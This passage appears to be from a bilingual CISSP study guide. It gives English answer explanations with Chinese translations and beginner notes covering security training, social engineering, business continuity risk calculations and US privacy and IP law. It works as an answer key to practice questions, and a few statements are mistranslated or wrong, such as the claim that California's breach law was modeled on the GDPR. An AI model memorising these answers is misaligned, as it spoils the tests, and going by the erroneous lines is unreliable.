对系统和运行环境的变更进行风险评估和影响分析,并报告系统的安全与 隐私状况。 16. B, F。 公司专有数据的泄露可能是由员工收到的电子邮件内容引起的。 点 击可疑电子邮件中链接的员工计算机可能已被恶意代码感染。 该恶意代码可能 将文档外传至社交媒体网站。 无论员工是在公司网络上的公司计算机上、在家 庭网络上的公司计算机上,还是在家庭网络上的个人计算机上(尤其是当员工 将公司文件复制到个人设备以在家办公时),都可能发生此问题。 阻止从公司 网络访问社交媒体网站和个人电子邮件服务,可降低此类事件再次发生的风险。 例如,即使可疑电子邮件被阻止进入公司电子邮件服务器和账户,它们仍可能 被接收至个人电子邮件账户中。 虽然未提及,但阻止访问恶意URL也是一种良 好的安全防御措施。 部署Web应用防火墙、更新公司电子邮件服务器、在电 子邮件服务器上使用多因素认证或对公司文件进行访问审查,均无法解决此问 题。 尽管所有这些选项总体上都是良好的安全实践,但它们与本问题并无直接 关联。 17. C. 培训是教导员工如何执行其工作任务并遵守安全政策。 培训通常由组 织举办,针对具有相似工作职能的员工群体。

(A)教育是学生和用户学习 远超其完成工作任务所需知识的过程。 教育通常与用户追求认证、寻求职位 晋升或职业发展相关。 大多数教育项目并非由雇主提供,而是由培训机构、 学院或大学提供。 教育并非根据员工的工作岗位进行群体化提供。 (B)安 全意识在全组织内建立共同的安全认知基础,聚焦于所有员工必须理解的关 键或基本安全主题和问题。 虽然由组织提供,但并不针对特定员工群体,因 为它适用于所有员工。 (D)终止通常针对个人,而非具有相似工作职位的 员工群体。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

认证:认证是验证“你是不是你声称的那个人”。

政策:政策是高层原则,说明必须遵守什么。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1471 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

密码、令牌、生物特征、多因素认证都服务认证。

Policy 高层、强制、稳定;Procedure 具体步骤。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
认证 认证是验证“你是不是你声称的那个人”。
政策 政策是高层原则,说明必须遵守什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 78 / PDF P1472

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

Though large layoff events might fire groups of similar workers, this option is not as accurate as training. 18. B, C, D. The activity described in option A is an opportunistic unauthorized access attack, which is not a social engineering attack since there was no interaction with the victim, just the opportunity when the victim walked away. The activities described in options B (hoax), C (phishing, hoax, watering hole attack), and D (vishing) are all examples of social engineering attacks. 19. B. The correct answer for these blanks is security champion(s).

Often a security champion is a member of a group who decides (or is assigned) to take charge of leading the adoption and integration of security concepts into the group's work activities. Security champions are often nonsecurity employees who take up the mantle to encourage others to support and adopt more security practices and behaviors. The other options are incorrect. A CISO, or chief information security officer, defines and enforces security throughout the organization. The security auditor is the person who manages security logging and reviews the audit trails for signs of compliance or violation.

The custodian is the security role that accepts assets from owners and then, based on the ownerassigned classifications, places the asset in the proper IT container where the proper security protections are provided. 20. D. Security awareness and training can often be improved through gamification. Gamification is a means to encourage compliance and engagement by integrating common elements of gameplay into other activities, such as security compliance and behavior change. This can include rewarding compliance behaviors and potentially punishing violating behaviors.

Many aspects of gameplay can be integrated into security training and adoption, such as scoring points, earning achievements or badges (i.e., earning recognition), competing with others, cooperating with others (i.e., teaming up with coworkers), following a set of common/standard rules, having a defined goal, seeking rewards, developing group stories/experiences, and avoiding pitfalls or negative game events. (A) Program effectiveness evaluation is using some means of verification, such as giving a quiz or monitoring security incident rate changes over time, to measure whether the training is beneficial or a waste of time and resources.

This question starts by indicating that security incidents are on the rise, which shows that prior training was ineffective. But the recommendations to change the training

中文直译 / 整理

尽管大规模裁员事件可能同时裁撤一批相似的员工,但此选项的准确性不 如培训。 18. B、C、D。 选项 A 中描述的活动是一种机会主义的未授权访问攻击,由于 没有与受害者进行任何互动,仅利用了受害者离开时的机会,因此不属于社会 工程攻击。 选项 B(虚假信息)、C(钓鱼、虚假信息、水坑攻击)和 D(语 音钓鱼)都是社会工程攻击的例子。 19. B。 这些空格的正确答案是安全倡导者。 通常,安全倡导者是团队中被指 定或主动承担起推动安全理念融入团队工作职责的成员。 安全倡导者通常是非 安全岗位的员工,他们主动承担起责任,鼓励他人支持并采纳更安全的实践和 行为。 其他选项均不正确。 CISO(首席信息安全部门负责人)负责在整个组 织内定义和执行安全策略。 安全审计员负责管理安全日志并审查审计跟踪,以 发现合规或违规迹象。 保管人是负责接收所有者移交的资产,并根据所有者分 配的分类,将资产置于具有适当安全保护措施的 IT 容器中的安全角色。 20. D. 安全意识和培训通常可以通过游戏化得到改善。 游戏化是一种通过将游 戏的常见元素整合到其他活动中(如安全合规和行为改变)来鼓励合规性和参 与度的方法。

这可以包括奖励合规行为,以及可能惩罚违规行为。 许多游戏元 素可以融入安全培训和推广中,例如:计分、获得成就或徽章(即获得认可)、 与他人竞争、与他人合作(即与同事组队)、遵循一套共同/标准规则、设定 明确目标、寻求奖励、构建群体故事/体验,以及避免陷阱或负面游戏事件。 (A)项目有效性评估是通过某种验证手段(如进行测验或监控安全事件率随 时间的变化)来衡量培训是否有效,还是浪费了时间和资源。 本题首先指出安 全事件正在增加,这表明之前的培训无效。 但建议改变培训

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

首席信息安全官:CISO 负责组织安全计划、策略、沟通和监督。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

CISO 需要足够独立性和高层支持。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 79 / PDF P1473

第 1473 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

are gamification-focused. (B) Onboarding is the process of adding new employees to the organization. This is not the concept being described in this scenario. (C) Compliance enforcement is the application of sanctions or consequences for failing to follow policy, training, best practices, and/or regulations.

中文直译 / 整理

以游戏化为重点。 (B) 入职是将新员工添加到组织中的过程。 这并非本场景 中所描述的概念。 (C) 合规执行是对未遵守政策、培训、最佳实践和/或法 规的行为施加制裁或后果。

小白解释

场景先行:你是公司的安全负责人,正在读第 1473 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1473 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
学习单元 80 / PDF P1474

第 1474 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chapter 3: Business Continuity Planning 1. B. As the first step of the process, the business organization analysis helps guide the remainder of the work. James and his core team should conduct this analysis and use the results to aid in the selection of team members and the design of the BCP process. 2. C. This question requires that you exercise some judgment, something that is extremely important for CISSP candidates. All of these answers are plausible things that Tracy could bring up, but we're looking for the best answer. In this case, that is ensuring that the organization is ready for an emergency—a mission-critical goal.

Telling managers that the exercise is already scheduled or required by policy doesn't address their concerns that it is a waste of time. Telling them that it won't be timeconsuming is not likely to be an effective argument because they are already raising concerns about the amount of time requested. 3. C. A firm's officers and directors are legally bound to exercise due diligence in conducting their activities. This concept creates a fiduciary responsibility on their part to ensure that adequate business continuity plans are in place. This is an element of corporate responsibility, but that term is vague and not commonly used to describe a board's responsibilities.

Disaster requirement and going concern responsibilities are also not risk management terms. 4. D. During the planning phase, the most significant resource utilization will be the time dedicated by members of the BCP team to the planning process. This represents a significant use of business resources and is another reason that buy-in from senior management is essential. 5. A. The quantitative portion of the priority identification should assign asset values in monetary units. The organization may also choose to assign other values to assets, but non-monetary measures should be part of a qualitative, rather than a quantitative, assessment. 6. C.

The annualized loss expectancy (ALE) represents the amount of money a business expects to lose to a given risk each year. This figure is quite useful when performing a quantitative prioritization of business continuity resource allocation. 7. C. The maximum tolerable downtime (MTD) represents the longest period a business function can be unavailable before causing irreparable

中文直译 / 整理

第3章:业务连续性规划 1. B. 作为该过程的第一步,业务组织分析有助于指导后续工作。 詹姆斯及 其核心团队应进行此项分析,并利用结果协助选定团队成员和设计BCP流 程。 2. C. 本题要求您运用一定的判断力,这对CISSP考生而言至关重要。 这些 答案都是特蕾西可能提出的合理观点,但我们需寻找最佳答案。 在此情况 下,最佳答案是确保组织已为紧急情况做好准备——这是一个至关重要的目 标。 告诉管理者该演练已安排好或由政策要求,并未解决他们认为这是浪 费时间的顾虑。 告诉他们这不会耗费大量时间也不太可能有效,因为他们 已经对所要求的时间量表达了担忧。 3. C. 公司的高管和董事在开展其活动时,依法负有尽职调查的责任。 这一概 念要求他们承担受托责任,以确保制定充分的业务连续性计划。 这是企业责 任的一部分,但“企业责任”一词含义模糊,并不常用于描述董事会的职责。 “灾难要求”和“持续经营责任”也不是风险管理体系中的术语。 4. D. 在规划阶段,最显著的资源消耗是BCP团队成员投入到规划过程中的 时间。 这代表了业务资源的重大使用,也是高层管理支持至关重要的另一 个原因。

5. A. 优先级识别的定量部分应以货币单位分配资产价值。 组织也可以选择为 资产分配其他值,但非货币度量应属于定性评估,而非定量评估。 6. C. 年化损失预期(ALE)表示企业每年因特定风险预期损失的金额。 在 对业务连续性资源分配进行定量优先级排序时,这一数据非常有用。 7. C. 最大可容忍停机时间(MTD)表示业务功能在造成不可逆转损害之前可以 不可用的最长时间。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

政策:政策是高层原则,说明必须遵守什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1474 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Due diligence 偏“确认事情被正确执行”。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

BCP 保护业务流程,DRP 保护 IT 恢复。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 81 / PDF P1475

第 1475 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

harm to the business. This figure is useful when determining the level of business continuity resources to assign to a particular function. 8. B. The single loss expectancy (SLE) is the product of the asset value (AV) and the exposure factor (EF). From the scenario, you know that the AV is $3 million and the EF is 90 percent, based on that the same land can be used to rebuild the facility. This yields an SLE of $2,700,000. 9. D. This problem requires you to compute the annualized loss expectancy (ALE), which is the product of the single loss expectancy (SLE) and the annualized rate of occurrence (ARO). From the scenario, you know that the ARO is 0.05 (or 5 percent).

From question 8, you know that the SLE is $2,700,000. This yields an ALE of $135,000. 10. A. This problem requires you to compute the ALE, which is the product of the SLE and ARO. From the scenario, you know that the ARO is 0.10 (or 10 percent). From the scenario presented, you know that the SLE is $7.5 million. This yields an ALE of $750,000. 11. C. Risk mitigation controls to address acceptable risks would not be in the BCP. The risk acceptance documentation should contain a thorough review of the risks facing the organization, including the determination as to which risks should be considered acceptable and unacceptable.

For acceptable risks, the documentation should include a rationale for that decision and a list of potential future events that might warrant a reconsideration of that determination. The documentation should include a list of controls used to mitigate unacceptable risks, but it would not include controls used to mitigate acceptable risks, since acceptable risks do not require mitigation. 12. D. The safety of human life must always be the paramount concern in business continuity planning. Be sure that your plan reflects this priority, especially in the written documentation that is disseminated to your organization's employees! 13. C.

It is difficult to put a dollar figure on the business lost because of negative publicity. Therefore, this type of concern is better evaluated through a qualitative analysis. The other items listed here are all more easily quantifiable. 14. B. The single loss expectancy (SLE) is the amount of damage that would be caused by a single occurrence of the risk. In this case, the SLE is $10 million, the expected damage from one tornado. The fact that a tornado

中文直译 / 整理

对业务造成损害。 在确定分配给特定功能的业务连续性资源水平时,此数值非 常有用。 8. B. 单次损失预期(SLE)是资产价值(AV)与暴露因子(EF)的乘积。 根据该场 景,你知道AV为 300万美元,EF为90%,基于同一块土地可用于重建设施。 由此得出SLE为 2,700,000美元。 9. D. 本题要求计算年化损失预期(ALE),它是单次损失预期(SLE)与年 化发生率(ARO)的乘积。 根据该场景,你知道ARO为0.05(或5%)。 从 第8题可知,SLE为2,700,000美元。 由此得出ALE为135,000美元。 10. A. 本题要求计算ALE,它是SLE与ARO的乘积。 根据该场景,你知道 ARO为0.10(或10%)。 根据所给场景,你知道SLE为750万美元。 由此得 出ALE为750,000美元。 11. C. 用于应对可接受风险的缓解控制措施不应包含在业务连续性计划( BCP)中。 风险接受文档应包含对组织所面临风险的全面审查,包括确定哪些 风险应被视为可接受或不可接受。 对于可接受的风险,文档应包含做出该决定 的理由,以及可能需要重新评估该决定的潜在未来事件列表。

文档应列出用于 缓解不可接受风险的控制措施,但不应包括用于缓解可接受风险的控制措施, 因为可接受风险无需缓解。 12. D. 在业务连续性规划中,保障人类生命安全必须始终是首要关注点。 请确 保您的计划体现这一优先级,尤其是在向组织员工分发的书面文档中! 13. C. 由于负面宣传导致的业务损失难以用金钱数额衡量。 因此,此类问 题更适合通过定性分析进行评估。 此处列出的其他项目则更容易量化。 14. B. 单次损失预期(SLE)是指一次风险事件所造成的损失金额。 在此情 况下,SLE为1000万美元,即一次龙卷风预计造成的损失。 龙卷风

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1475 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 82 / PDF P1476

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

occurs only once every 100 years is not reflected in the SLE but would be reflected in the annualized loss expectancy (ALE). 15. C. The annualized loss expectancy (ALE) is computed by taking the product of the single loss expectancy (SLE), which was $10 million in this scenario, and the annualized rate of occurrence (ARO), which was 0.01 in this example. These figures yield an ALE of $100,000. 16. C. In the provisions and processes subtask, the BCP team designs the procedures and mechanisms to mitigate risks that were deemed unacceptable during the strategy development phase. 17. D. This is an example of alternative systems.

Redundant communications circuits provide backup links that may be used when the primary circuits are unavailable. 18. C. Disaster recovery plans pick up where business continuity plans leave off. After a disaster strikes and the business is interrupted, the disaster recovery plan guides response teams in their efforts to quickly restore business operations to normal levels. 19. A. The annualized rate of occurrence (ARO) is the likelihood that the risk will materialize in any given year. The fact that a power outage did not occur in any of the past three years doesn't change the probability that one will occur in the upcoming year.

Unless other circumstances have changed, the ARO should remain the same. 20. C. You should strive to have the highest-ranking person possible sign the BCP's statement of importance. Of the choices given, the chief executive officer (CEO) is the highest ranking.

中文直译 / 整理

每100年才发生一次的事件在SLE中未体现,但在年化损失预期(ALE)中会 体现。 15. C. 年度预期损失(ALE)通过将单次损失预期(SLE)——在此情景中 为1000万美元——与年度发生率(ARO)——在此示例中为0.01——相乘计 算得出。 这些数值得出的ALE为10万美元。 16. C. 在条款与流程子任务中,BCP团队设计程序和机制,以缓解在策略 开发阶段被认定为不可接受的风险。 17. D. 这是备用系统的示例。 冗余通信电路提供备用链路,当主电路不可 用时可使用这些链路。 18. C. 灾难恢复计划接续业务连续性计划未完成的部分。 在灾难发生且业务 中断后,灾难恢复计划指导响应团队努力迅速将业务运营恢复至正常水平。 19. A. 年度发生率(ARO)是指风险在任何一年内发生的可能性。 过去三年 未发生停电并不改变明年发生停电的概率。 除非其他情况发生变化,否则 ARO应保持不变。 20. C. 您应努力让级别最高的人签署业务连续性计划(BCP)的重要性声明。 在所给选项中,首席执行官(CEO)级别最高。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

程序:程序是一步一步怎么做。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
程序 程序是一步一步怎么做。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 83 / PDF P1477

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Chapter 4: Laws, Regulations, and Compliance 1. C. The Bureau of Industry and Security within the Department of Commerce sets regulations on the export of encryption products outside of the United States. The other agencies listed here are not involved in regulating exports. 2. A. The Federal Information Security Management Act (FISMA) includes provisions regulating information security at federal agencies. It places authority for classified systems in the hands of the National Security Agency (NSA) and authority for all other systems with the National Institute for Standards and Technology (NIST). 3. D.

Administrative laws do not require an act of the legislative branch to implement at the federal level. Administrative laws consist of the policies, procedures, and regulations promulgated by agencies of the executive branch of government. Although they do not require an act of Congress, these laws are subject to judicial review and must comply with criminal and civil laws enacted by the legislative branch. 4. A. The California Consumer Privacy Act (CCPA) of 2018 was the first sweeping data privacy law enacted by a U.S. state.

This follows California's passing of the first data breach notification law, which was modeled after the requirements of the European Union's General Data Protection Regulation (GDPR). 5. B. The Communications Assistance for Law Enforcement Act (CALEA) required that communications carriers assist law enforcement with the implementation of wiretaps when done under an appropriate court order. CALEA only applies to communications carriers and does not apply to financial institutions, healthcare organizations, or websites. 6. B. The Fourth Amendment to the U.S.

Constitution sets the “probable cause” standard that law enforcement officers must follow when conducting searches and/or seizures of private property. It also states that those officers must obtain a warrant before gaining involuntary access to such property. The Privacy Act regulates what information government agencies may collect and maintain about individuals. The Second Amendment grants the right to keep and bear arms. The Gramm–Leach–Bliley Act regulates financial institutions, not the federal government.

中文直译 / 整理

第四章:法律、法规与合规 1. C. 商务部下属的工业与安全局负责制定加密产品出口至美国境外的法规。 此处列出的其他机构均不参与出口监管。 2. A. 联邦信息安全管理法(FISMA)包含规范联邦机构信息安全的规定。 它将分类系统的管理权赋予国家安全局(NSA),将所有其他系统的管理权 赋予国家标准与技术研究院(NIST)。 3. D. 行政法规在联邦层面实施时无需立法机构通过法案。 行政法规由政府行 政部门发布的政策、程序和规定组成。 尽管这些法规无需国会立法,但仍需 接受司法审查,并须符合立法机构颁布的刑事和民事法律。 4. A. 2018年通过的《加州消费者隐私法案》(CCPA)是美国各州颁布的 首部全面数据隐私法。 这继加州通过美国首个数据泄露通知法之后,该法 借鉴了欧盟《通用数据保护条例》(GDPR)的要求。 5. B. 通信协助执法法(CALEA)要求通信运营商在根据适当法院命令实施 窃听时协助执法部门。 CALEA 仅适用于通信运营商,不适用于金融机构、医 疗组织或网站。 6. B. 美国宪法第四修正案规定了执法官员在搜查和/或扣押私人财产时必须 遵循的“合理根据”标准。

它还规定,这些官员在非法获取此类财产前必须 获得搜查令。 《隐私法》规范了政府机构可以收集和保存的关于个人的信息。 第二修正案赋予了持有和携带武器的权利。 《格拉姆‑里奇‑布利雷法案》规 范的是金融机构,而非联邦政府。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 84 / PDF P1478

第 1478 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

7. A. Copyright law is the only type of intellectual property protection available to Matthew. It covers only the specific software code that Matthew used. It does not cover the process or ideas behind the software. Trademark protection is not appropriate for this type of situation because it would only protect the name and/or logo of the software, not its algorithms. Patent protection does not apply to mathematical algorithms. Matthew can't seek trade secret protection because he plans to publish the algorithm in a public technical journal. 8. D. Mary and Joe should treat their oil formula as a trade secret.

As long as they do not publicly disclose the formula, they can keep it a company secret indefinitely. Copyright and patent protection both have expiration dates and would not meet Mary and Joe's requirements. Trademark protection is for names and logos and would not be appropriate in this case. 9. C. Richard's product name should be protected under trademark law. Until his registration is granted, he can use the ™ symbol next to it to inform others that it is protected under trademark law. Once his application is approved, the name becomes a registered trademark, and Richard can begin using the ® symbol. The © symbol is used to represent a copyright.

The † symbol is not associated with intellectual property protections. 10. A. The Privacy Act of 1974 limits the ways government agencies may use information that private citizens disclose to them under certain circumstances. The Electronic Communications Privacy Act (ECPA) implements safeguards against electronic eavesdropping. The Health Insurance Portability and Accountability Act (HIPAA) regulates the protection and sharing of health records. The Gramm–Leach–Bliley Act requires that financial institutions protect customer records. 11. D. The European Union provides standard contractual clauses that may be used to facilitate data transfer.

That would be the best choice in a case where two different companies are sharing data. If the data were being shared internally within a company, binding corporate rules would also be an option. The EU/US Privacy Shield was a safe harbor agreement that would previously have allowed the transfer but that is no longer valid. Privacy Lock is a made-up term. 12. A. The Children's Online Privacy Protection Act (COPPA) provides severe penalties for companies that collect information from young children 7. A.

中文直译 / 整理

